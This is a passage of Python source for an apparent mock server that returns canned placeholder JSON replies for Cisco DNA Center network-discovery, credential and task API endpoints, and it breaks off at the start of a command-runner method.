def tag_get_tag_response(self):
    """Write a canned 200 JSON mock reply for the get-tag endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': [{'systemTag': True, 'description': 'string', 'dynamicRules': [{'memberType': 'string', 'rules': {'values': ['string'], 'items': ['string'], 'operation': 'string', 'name': 'string', 'value': 'string'}}], 'name': 'string', 'id': 'string', 'instanceTenantId': 'string'}]})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_069d9823451b892d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_069d9823451b892d_PATTERN, self.path)
def network_discovery_getcountofalldiscoveryjobs_response(self):
    """Write a canned 200 JSON mock reply for the get-count-of-all-discovery-jobs endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': 0, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_17929bc7465bb564(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_17929bc7465bb564_PATTERN, self.path)
def network_discovery_create_netconfcredentials_response(self):
    """Write a canned 200 JSON mock reply for the create-netconf-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_10b06a6a4f7bb3cb(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_10b06a6a4f7bb3cb_PATTERN, self.path)
def network_discovery_update_snmpwritecommunity_response(self):
    """Write a canned 200 JSON mock reply for the update-snmp-write-community endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_1da5ebdd434aacfe(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_1da5ebdd434aacfe_PATTERN, self.path)
def network_discovery_update_snmpv3credentials_response(self):
    """Write a canned 200 JSON mock reply for the update-snmpv3-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_47a1b84b4e1b8044(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_47a1b84b4e1b8044_PATTERN, self.path)
def network_discovery_update_snmpreadcommunity_response(self):
    """Write a canned 200 JSON mock reply for the update-snmp-read-community endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_33b799d04d0a8907(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_33b799d04d0a8907_PATTERN, self.path)
def network_discovery_get_discoveriesbyrange_response(self):
    """Write a canned 200 JSON mock reply for the get-discoveries-by-range endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': [{'attributeInfo': {}, 'cdpLevel': 0, 'deviceIds': 'string', 'discoveryCondition': 'string', 'discoveryStatus': 'string', 'discoveryType': 'string', 'enablePasswordList': 'string', 'globalCredentialIdList': ['string'], 'httpReadCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'httpWriteCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'id': 'string', 'ipAddressList': 'string', 'ipFilterList': 'string', 'isAutoCdp': True, 'lldpLevel': 0, 'name': 'string', 'netconfPort': 'string', 'numDevices': 0, 'parentDiscoveryId': 'string', 'passwordList': 'string', 'preferredMgmtIPMethod': 'string', 'protocolOrder': 'string', 'retryCount': 0, 'snmpAuthPassphrase': 'string', 'snmpAuthProtocol': 'string', 'snmpMode': 'string', 'snmpPrivPassphrase': 'string', 'snmpPrivProtocol': 'string', 'snmpRoCommunity': 'string', 'snmpRoCommunityDesc': 'string', 'snmpRwCommunity': 'string', 'snmpRwCommunityDesc': 'string', 'snmpUserName': 'string', 'timeOut': 0, 'updateMgmtIp': True, 'userNameList': 'string'}], 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_3d9b99c343398a27(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_3d9b99c343398a27_PATTERN, self.path)
def network_discovery_getnetworkdevicesfrom_discovery_response(self):
    """Write a canned 200 JSON mock reply for the get-network-devices-from-discovery endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': 0, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_4d9ca8e2431a8a24(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_4d9ca8e2431a8a24_PATTERN, self.path)
def network_discovery_create_httpwritecredentials_response(self):
    """Write a canned 200 JSON mock reply for the create-http-write-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_44974ba5435a801d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_44974ba5435a801d_PATTERN, self.path)
def network_discovery_get_snmpproperties_response(self):
    """Write a canned 200 JSON mock reply for the get-snmp-properties endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': [{'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'intValue': 0, 'systemPropertyName': 'string'}], 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_4c8cab5f435a80f4(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_4c8cab5f435a80f4_PATTERN, self.path)
def network_discovery_deletediscoveryby_id_response(self):
    """Write a canned 200 JSON mock reply for the delete-discovery-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_55b439dc4239b140(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_55b439dc4239b140_PATTERN, self.path)
def network_discovery_startdiscovery_response(self):
    """Write a canned 200 JSON mock reply for the start-discovery endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_63bb88b74f59aa17(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_63bb88b74f59aa17_PATTERN, self.path)
def network_discovery_get_discoveryby_id_response(self):
    """Write a canned 200 JSON mock reply for the get-discovery-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'attributeInfo': {}, 'cdpLevel': 0, 'deviceIds': 'string', 'discoveryCondition': 'string', 'discoveryStatus': 'string', 'discoveryType': 'string', 'enablePasswordList': 'string', 'globalCredentialIdList': ['string'], 'httpReadCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'httpWriteCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'id': 'string', 'ipAddressList': 'string', 'ipFilterList': 'string', 'isAutoCdp': True, 'lldpLevel': 0, 'name': 'string', 'netconfPort': 'string', 'numDevices': 0, 'parentDiscoveryId': 'string', 'passwordList': 'string', 'preferredMgmtIPMethod': 'string', 'protocolOrder': 'string', 'retryCount': 0, 'snmpAuthPassphrase': 'string', 'snmpAuthProtocol': 'string', 'snmpMode': 'string', 'snmpPrivPassphrase': 'string', 'snmpPrivProtocol': 'string', 'snmpRoCommunity': 'string', 'snmpRoCommunityDesc': 'string', 'snmpRwCommunity': 'string', 'snmpRwCommunityDesc': 'string', 'snmpUserName': 'string', 'timeOut': 0, 'updateMgmtIp': True, 'userNameList': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_6bacb8d14639bdc7(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_6bacb8d14639bdc7_PATTERN, self.path)
def network_discovery_create_snmpwritecommunity_response(self):
    """Write a canned 200 JSON mock reply for the create-snmp-write-community endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_948ea8194348bc0b(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_948ea8194348bc0b_PATTERN, self.path)
def network_discovery_create_cli_credentials_response(self):
    """Write a canned 200 JSON mock reply for the create-cli-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_89b36b4649999d81(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_89b36b4649999d81_PATTERN, self.path)
def network_discovery_update_httpreadcredential_response(self):
    """Write a canned 200 JSON mock reply for the update-http-read-credential endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_99872a134d0a9fb4(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_99872a134d0a9fb4_PATTERN, self.path)
def network_discovery_getlistofdiscoveriesbydiscovery_id_response(self):
    """Write a canned 200 JSON mock reply for the get-list-of-discoveries-by-discovery-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': [{'attributeInfo': {}, 'cliStatus': 'string', 'discoveryStatus': 'string', 'endTime': 'string', 'httpStatus': 'string', 'id': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'ipAddress': 'string', 'jobStatus': 'string', 'name': 'string', 'netconfStatus': 'string', 'pingStatus': 'string', 'snmpStatus': 'string', 'startTime': 'string', 'taskId': 'string'}], 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_979688084b7ba60d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_979688084b7ba60d_PATTERN, self.path)
def network_discovery_create_snmpv3credentials_response(self):
    """Write a canned 200 JSON mock reply for the create-snmpv3-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_a5ac99774c6bb541(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_a5ac99774c6bb541_PATTERN, self.path)
def network_discovery_create_update_snmpproperties_response(self):
    """Write a canned 200 JSON mock reply for the create/update-snmp-properties endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_9788b8fc4418831d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_9788b8fc4418831d_PATTERN, self.path)
def network_discovery_updatesdiscoveryby_id_response(self):
    """Write a canned 200 JSON mock reply for the update-discovery-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_b68a6bd8473a9a25(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_b68a6bd8473a9a25_PATTERN, self.path)
def network_discovery_update_httpwritecredentials_response(self):
    """Write a canned 200 JSON mock reply for the update-http-write-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_c1ba9a424c08a01b(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_c1ba9a424c08a01b_PATTERN, self.path)
def network_discovery_deletediscoverybyspecifiedrange_response(self):
    """Write a canned 200 JSON mock reply for the delete-discovery-by-specified-range endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_db8e09234a988bab(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_db8e09234a988bab_PATTERN, self.path)
def network_discovery_deletealldiscovery_response(self):
    """Write a canned 200 JSON mock reply for the delete-all-discovery endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_a6965b454c9a8663(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_a6965b454c9a8663_PATTERN, self.path)
def network_discovery_get_devicesdiscoveredby_id_response(self):
    """Write a canned 200 JSON mock reply for the get-devices-discovered-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': 0, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_f5ac590c4ca9975a(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_f5ac590c4ca9975a_PATTERN, self.path)
def network_discovery_deleteglobalcredentialsby_id_response(self):
    """Write a canned 200 JSON mock reply for the delete-global-credentials-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_fba0d80747eb82e8(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_fba0d80747eb82e8_PATTERN, self.path)
def network_discovery_update_cli_credentials_response(self):
    """Write a canned 200 JSON mock reply for the update-cli-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_bf859ac64a0ba19c(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.NETWORK_DISCOVERY_bf859ac64a0ba19c_PATTERN, self.path)
def network_discovery_create_httpreadcredentials_response(self):
    """Write a canned 200 JSON mock reply for the create-http-read-credentials endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORK_DISCOVERY_c5acd9fa4c1a8abc(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_c5acd9fa4c1a8abc_PATTERN, self.path)
def network_discovery_update_netconfcredentials_response(self):
    """Send a mocked 200 OK task envelope for 'update netconf credentials'."""
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_58a3699e489b9529(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_58a3699e489b9529_PATTERN, self.path)
def network_discovery_get_credentialsubtypebycredential_id_response(self):
    """Send a mocked 200 OK JSON reply for 'get credential sub type by credential id'."""
    body = json.dumps({'response': 'string', 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_709fda3c42b8877a(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_709fda3c42b8877a_PATTERN, self.path)
def network_discovery_updateglobalcredentials_response(self):
    """Send a mocked 200 OK task envelope for 'update global credentials'."""
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_7aa3da9d4e098ef2(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_7aa3da9d4e098ef2_PATTERN, self.path)
def network_discovery_create_snmpreadcommunity_response(self):
    """Send a mocked 200 OK task envelope for 'create SNMP read community'."""
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_a4967be64dfaaa1a(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_a4967be64dfaaa1a_PATTERN, self.path)
def network_discovery_get_discoveryjobsby_ip_response(self):
    """Send a mocked 200 OK discovery-job list for 'get discovery jobs by IP'."""
    body = json.dumps({'response': [{'attributeInfo': {}, 'cliStatus': 'string', 'discoveryStatus': 'string', 'endTime': 'string', 'httpStatus': 'string', 'id': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'ipAddress': 'string', 'jobStatus': 'string', 'name': 'string', 'netconfStatus': 'string', 'pingStatus': 'string', 'snmpStatus': 'string', 'startTime': 'string', 'taskId': 'string'}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_a6b798ab4acaa34e(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_a6b798ab4acaa34e_PATTERN, self.path)
def network_discovery_get_discovereddevicesbyrange_response(self):
    """Send a mocked 200 OK JSON reply for 'get discovered devices by range'.

    Writes the status line, a JSON Content-Type header, and a canned
    device-list payload whose fields mirror the DNA Center API schema.
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'response': [{'anchorWlcForAp': 'string', 'authModelId': 'string', 'avgUpdateFrequency': 0, 'bootDateTime': 'string', 'cliStatus': 'string', 'duplicateDeviceId': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'httpStatus': 'string', 'id': 'string', 'imageName': 'string', 'ingressQueueConfig': 'string', 'interfaceCount': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'netconfStatus': 'string', 'numUpdates': 0, 'pingStatus': 'string', 'platformId': 'string', 'portRange': 'string', 'qosStatus': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'snmpStatus': 'string', 'softwareVersion': 'string', 'tag': 'string', 'tagCount': 0, 'type': 'string', 'upTime': 'string', 'vendor': 'string', 'wlcApDeviceStatus': 'string'}], 'version': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_NETWORK_DISCOVERY_ff816b8e435897eb(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_ff816b8e435897eb_PATTERN, self.path)
def network_discovery_get_globalcredentials_response(self):
    """Send a mocked 200 OK credential list for 'get global credentials'."""
    body = json.dumps({'response': [{'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string'}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NETWORK_DISCOVERY_f6ac994f451ba011(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NETWORK_DISCOVERY_f6ac994f451ba011_PATTERN, self.path)
def network_discovery_get_discoverednetworkdevicesbydiscovery_id_response(self):
    """Send a mocked 200 OK JSON reply for 'get discovered network devices by discovery id'.

    Writes the status line, a JSON Content-Type header, and a canned
    device-list payload whose fields mirror the DNA Center API schema.
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'response': [{'anchorWlcForAp': 'string', 'authModelId': 'string', 'avgUpdateFrequency': 0, 'bootDateTime': 'string', 'cliStatus': 'string', 'duplicateDeviceId': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'httpStatus': 'string', 'id': 'string', 'imageName': 'string', 'ingressQueueConfig': 'string', 'interfaceCount': 'string', 'inventoryCollectionStatus': 'string', 'inventoryReachabilityStatus': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'netconfStatus': 'string', 'numUpdates': 0, 'pingStatus': 'string', 'platformId': 'string', 'portRange': 'string', 'qosStatus': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'snmpStatus': 'string', 'softwareVersion': 'string', 'tag': 'string', 'tagCount': 0, 'type': 'string', 'upTime': 'string', 'vendor': 'string', 'wlcApDeviceStatus': 'string'}], 'version': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_TASK_26b44ab04649a183(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.TASK_26b44ab04649a183_PATTERN, self.path)
def task_gettaskcount_response(self):
    """Send a mocked 200 OK JSON reply for 'get task count'."""
    body = json.dumps({'response': 0, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_TASK_a1a9387346ba92b1(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.TASK_a1a9387346ba92b1_PATTERN, self.path)
def task_gettaskby_id_response(self):
    """Send a mocked 200 OK task object for 'get task by id'."""
    body = json.dumps({'response': {'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_TASK_e78bb8a2449b9eed(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.TASK_e78bb8a2449b9eed_PATTERN, self.path)
def task_gettasks_response(self):
    """Send a mocked 200 OK task list for 'get tasks'."""
    body = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_TASK_f5a269c44f2a95fa(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.TASK_f5a269c44f2a95fa_PATTERN, self.path)
def task_gettasktree_response(self):
    """Send a mocked 200 OK task list for 'get task tree'."""
    body = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_TASK_e487f8d3481b94f2(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.TASK_e487f8d3481b94f2_PATTERN, self.path)
def task_gettaskby_operation_id_response(self):
    """Send a mocked 200 OK task list for 'get task by operation id'."""
    body = json.dumps({'response': [{'additionalStatusURL': 'string', 'data': 'string', 'endTime': 'string', 'errorCode': 'string', 'errorKey': 'string', 'failureReason': 'string', 'id': 'string', 'instanceTenantId': 'string', 'isError': True, 'lastUpdate': 'string', 'operationIdList': {}, 'parentId': 'string', 'progress': 'string', 'rootId': 'string', 'serviceType': 'string', 'startTime': 'string', 'username': 'string', 'version': 0}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_COMMAND_RUNNER_33bb2b9d40199e14(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.COMMAND_RUNNER_33bb2b9d40199e14_PATTERN, self.path)
def command_runner_getallkeywordsof_cli_saccepted_response(self):
